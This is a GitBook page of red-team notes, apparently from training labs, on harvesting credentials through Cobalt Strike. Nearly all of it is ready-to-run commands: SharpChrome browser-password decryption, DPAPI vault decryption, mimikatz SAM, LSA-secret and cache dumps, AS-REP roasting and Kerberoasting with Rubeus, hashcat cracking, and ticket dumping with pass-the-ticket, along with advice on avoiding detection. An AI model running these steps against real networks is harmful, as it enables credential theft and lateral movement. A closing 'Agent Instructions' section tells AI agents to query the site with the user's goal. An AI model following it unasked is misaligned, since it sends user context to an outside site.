> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/c2-frameworks/cobalt-strike/credentials.md). # Credentials *** ## Browser Credentials SharpChrome can read and decrypt saved browser credentials. Works from **medium-integrity** context. ``` execute-assembly C:\Tools\SharpDPAPI\SharpChrome\bin\Release\SharpChrome.exe logins ``` *** ## Windows Credential Manager Stores credentials for RDP connections, etc. Works from **medium-integrity** context. ``` # Enumerate saved credentials execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault # Decrypt via DC using DPAPI backup key execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /rpc ``` *** ## OS Credential Dumping > **OPSEC WARNING:** Avoid dumping credentials from LSASS. Security drivers use `ObRegisterCallbacks` to detect handles to LSASS. ### Logon Passwords (AVOID) ``` # DO NOT DO THIS - triggers detections mimikatz sekurlsa::logonpasswords ``` Crack NTLM with hashcat mode 1000: ```bash hashcat -a 0 -m 1000 ntlm.hash wordlist.txt -r rules/dive.rule ``` ### Kerberos Encryption Keys (AVOID) ``` # DO NOT DO THIS - triggers detections mimikatz sekurlsa::ekeys ``` **Note:** Mimikatz incorrectly labels hashes as `des_cbc_md4`. Check length: * 64 chars = `aes256-cts-hmac-sha1-96` * 32 chars = `aes128-cts-hmac-sha1-96` or `rc4_hmac` Crack AES256 with hashcat mode 28900: ```bash # Format: $krb5db$18$$$ hashcat -a 0 -m 28900 aes256.hash wordlist.txt -r rules/dive.rule ``` ### SAM Database (SAFE) Does **not** touch LSASS - safe to run. ``` # High integrity (not SYSTEM) mimikatz !lsadump::sam # SYSTEM context mimikatz lsadump::sam ``` ### LSA Secrets (SAFE) Contains service account passwords, machine account password, EFS keys. ``` # High integrity (not SYSTEM) mimikatz !lsadump::secrets # SYSTEM context mimikatz lsadump::secrets ``` ### Cached Domain Credentials MSCacheV2 hashes - slow to crack. ``` mimikatz lsadump::cache ``` *** ## AS-REP Roasting > **OPSEC WARNING:** Each AS-REP generates 4768 event. Don't roast the whole domain. ### Enumerate Vulnerable Users First ``` # Find users with pre-auth disabled ldapsearch (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304)) --attributes cn,samaccountname,serviceprincipalname ``` ### Roast Specific User ``` # Target specific account only execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:oracle_svc /format:hashcat /nowrap ``` ### Crack Hash ```bash hashcat -a 0 -m 18200 asrep.hash wordlist.txt -r rules/dive.rule ``` *** ## Kerberoasting > **OPSEC WARNING:** Don't roast every SPN. Triage targets first. ### Enumerate SPNs First ``` execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe -s "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))" --attributes cn,samaccountname,serviceprincipalname ``` ### Roast Specific SPN ``` # By SPN execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /spn:MSSQLSvc/ilf-sql-1.inlanefreight.local:1433 /simple /nowrap # By username execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /format:hashcat /nowrap ``` ### Crack Hash ```bash hashcat -a 0 -m 13100 kerb.hash wordlist.txt -r rules/dive.rule ``` *** ## Extracting Tickets from Memory > **OPSEC SAFE:** Uses LSA APIs (`LsaCallAuthenticationPackage`), doesn't open handle to LSASS. Requires **high-integrity** to dump other users' tickets. ### Triage Tickets ``` execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage ``` Look for tickets with `krbtgt` service - these are TGTs. ### Dump Specific Ticket ``` execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x2842e6 /service:krbtgt /nowrap ``` ### Impersonate User with Ticket ``` # Create sacrificial logon session execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\notepad.exe /username:tmorgan /domain:INLANEFREIGHT.LOCAL /password:FakePass # Inject ticket into session execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x132ef34 /ticket: # Verify run klist # Drop impersonation rev2self ``` *** ## Renewing TGTs TGTs can be renewed every 10 hours until RenewTill date. ### Check Ticket Validity ``` execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe describe /ticket: ``` ### Renew Ticket ``` execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe renew /ticket: /nowrap ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://book.ice-wzl.xyz/c2-frameworks/cobalt-strike/credentials.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.